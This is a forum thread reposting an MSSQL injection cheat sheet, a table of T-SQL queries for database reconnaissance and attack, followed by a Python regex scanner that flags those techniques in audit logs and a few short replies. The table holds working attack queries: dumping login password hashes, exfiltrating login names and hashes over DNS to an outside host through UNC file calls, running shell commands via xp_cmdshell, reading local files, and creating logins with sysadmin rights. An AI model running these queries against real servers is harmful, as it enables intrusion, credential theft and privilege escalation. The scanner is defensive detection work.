
MSSQL Injection Cheat Sheet



Void
03-20-2015, 01:10 PM
** Some of the queries in the table below can only be run by an admin (SA Privilege).
These are marked with "-- priv" at the end of the query. **

+---------------+---------------------------------------------------------------------------+
| Version | SELECT @@version |
|---------------|---------------------------------------------------------------------------|
| Comments | SELECT 1 -- comment |
| | SELECT /*comment*/1 |
|---------------|---------------------------------------------------------------------------|
| | SELECT user_name(); |
| | SELECT system_user; |
| Current User | SELECT user; |
| | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
|---------------|---------------------------------------------------------------------------|
| List Users | SELECT name FROM master..syslogins |
|---------------|---------------------------------------------------------------------------|
| | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv |
| | |
| | SELECT name, master.dbo.fn_varbintohexstr(password) |
| | FROM master..sysxlogins -- priv |
| List Password | |
| Hashes | MSSQL2005: SELECT name, password_hash FROM |
| | master.sys.sql_logins -- priv |
| | |
| | SELECT name + '-' + |
| | master.sys.fn_varbintohexstr(password_hash) |
| | FROM master.sys.sql_logins -- priv |
|---------------|---------------------------------------------------------------------------|
| | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? |
| | returns 1 for true, 0 for false, NULL for invalid role. |
| | Also try 'bulkadmin', 'systemadmin' and other values. |
| List DBA | |
| Accounts | |
| | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? |
| | returns 1 for true, 0 for false, NULL for invalid role/username. |
|---------------|---------------------------------------------------------------------------|
| Current DB | SELECT DB_NAME() |
|---------------|---------------------------------------------------------------------------|
| List | SELECT name FROM master..sysdatabases; |
| Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ... |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE |
| | name = 'mytable'); -- for the current DB only |
| | |
| List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM |
| | master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list column names |
| | and types for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM master..sysobjects WHERE xtype = 'U'; |
| | (Use xtype = 'V' for views) |
| | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; |
| | |
| List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) |
| | FROM master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list column names and types |
| | for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | -- NB: This example works only for the current database. |
| | If you want to search another db, you need to specify the db name |
| Find Tables | (e.g. replace sysobjects with mydb..sysobjects). |
| From | |
| Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname |
| | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id |
| | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- |
| | this lists table, column for each column containing the word 'password' |
|---------------|---------------------------------------------------------------------------|
| Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins |
| Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row |
|---------------|---------------------------------------------------------------------------|
|Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c |
|---------------|---------------------------------------------------------------------------|
| Bitwise AND | SELECT 6 & 2 -- returns 2 |
| | SELECT 6 & 1 -- returns 0 |
|---------------|---------------------------------------------------------------------------|
| ASCII Value | SELECT char(0x41) -- returns A |
| -> Char | |
|---------------|---------------------------------------------------------------------------|
| Char -> ASCII | SELECT ascii('A') -- returns 65 |
| Value | |
|---------------|---------------------------------------------------------------------------|
| Casting | SELECT CAST('1' as int); |
| | SELECT CAST(1 as char) |
|---------------|---------------------------------------------------------------------------|
| String | SELECT 'A' + 'B' -- returns AB |
| Concatenation | |
|---------------|---------------------------------------------------------------------------|
| If Statement | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Avoiding Quotes| SELECT char(65)+char(66) -- returns AB |
|---------------|---------------------------------------------------------------------------|
| Time Delay | WAITFOR DELAY '0:0:5' -- pause for 5 seconds |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name FROM master..syslogins; |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); |
| | -- nonpriv, works on 2000 |
| | |
| | declare @host varchar(800); select @host = name + '-' + |
| Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' |
| DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005 |
| | |
| | -- NB: Concatenation is not allowed in calls to these SPs, hence why we |
| | have to use @host. Messy but necessary. |
| | -- Also check out the DNS tunnel feature of sqlninja |
|---------------|---------------------------------------------------------------------------|
| Command | EXEC xp_cmdshell 'net user'; -- priv |
| Execution | |
|---------------|---------------------------------------------------------------------------|
| Local | CREATE TABLE mydata (line varchar(8000)); |
| File Access | BULK INSERT mydata FROM 'c:\boot.ini'; |
| | DROP TABLE mydata; |
|---------------|---------------------------------------------------------------------------|
| Hostname, IP | SELECT HOST_NAME() |
|---------------|---------------------------------------------------------------------------|
| Create Users | EXEC sp_addlogin 'user', 'pass'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Drop Users | EXEC sp_droplogin 'user'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv |
+---------------+---------------------------------------------------------------------------+
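
A defender-side use of the same list: a small triage scanner, added here as an example and not part of the post, that tags statements from a SQL Server audit or query-store export by which family of cheat-sheet technique they resemble (command execution, login tampering, hash reads, file/UNC access, timing probes, recon, quote evasion, comment truncation). The regexes, family names and audit lines are constructed for this example.

```python
import re

# Indicator families lifted from the cheat sheet above; the regexes and
# sample lines are constructed for this example, not a vendor rule set.
INDICATORS = {
    "command_execution": [r"\bxp_cmdshell\b"],
    "login_tampering": [r"\bsp_addsrvrolemember\b", r"\bsp_addlogin\b", r"\bsp_droplogin\b"],
    "credential_access": [r"\bsysxlogins\b", r"\bsql_logins\b", r"\bfn_varbintohexstr\b"],
    "file_or_unc_access": [r"\bxp_fileexist\b", r"\bxp_getfiledetails\b",
                           r"\bbulk\s+insert\b", r"\\\\"],  # UNC path building
    "time_based_probe": [r"\bwaitfor\s+delay\b"],
    "schema_recon": [r"@@version", r"\bis_srvrolemember\b", r"\bsysdatabases\b",
                     r"\bsyslogins\b", r"\bsysobjects\b", r"\bsyscolumns\b"],
    "quote_evasion": [r"\bchar\s*\(\s*(?:0x[0-9a-f]+|\d+)\s*\)\s*\+\s*char\s*\("],
    "comment_truncation": [r"'\s*;?\s*(?:--|/\*)"],  # literal closed, rest commented out
}
COMPILED = {fam: [re.compile(p, re.IGNORECASE) for p in pats]
            for fam, pats in INDICATORS.items()}

# Families marked "-- priv" in the sheet, or that touch files and logins, should page
# someone; the rest are triage context that also shows up in legitimate admin sessions.
HIGH = {"command_execution", "login_tampering", "credential_access", "file_or_unc_access"}

def classify(sql):
    """Return the set of indicator families present in one statement."""
    return {fam for fam, regs in COMPILED.items() if any(r.search(sql) for r in regs)}

def severity(families):
    if families & HIGH:
        return "high"
    return "medium" if families else "none"

def scan(lines):
    """Return (line_no, severity, sorted families) for each line that trips an indicator."""
    hits = []
    for no, line in enumerate(lines, 1):
        fams = classify(line)
        if fams:
            hits.append((no, severity(fams), sorted(fams)))
    return hits

# Constructed audit-log excerpt: one benign query plus statements shaped like the sheet's.
SAMPLE_LOG = [
    "SELECT name FROM customers WHERE id = 42",
    "SELECT name FROM customers WHERE id = 42; WAITFOR DELAY '0:0:5' --",
    "EXEC xp_cmdshell 'net user'; -- priv",
    "SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins",
    r"declare @host varchar(800); exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''')",
    "SELECT char(65)+char(66)",
]
```

Run `scan(SAMPLE_LOG)` to see the benign first line dropped and the remaining five tagged; tune the `HIGH` set to what your own DBAs legitimately run before wiring it to an alert.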

According
04-14-2016, 09:56 PM
What can I do with this?

jjjay
10-21-2016, 01:22 AM
Interesting. Is there any difference when injecting ASPX over PHP?

telecimo
12-05-2016, 08:41 PM
Good job.

nao95
03-26-2017, 11:22 AM
well appreciated bro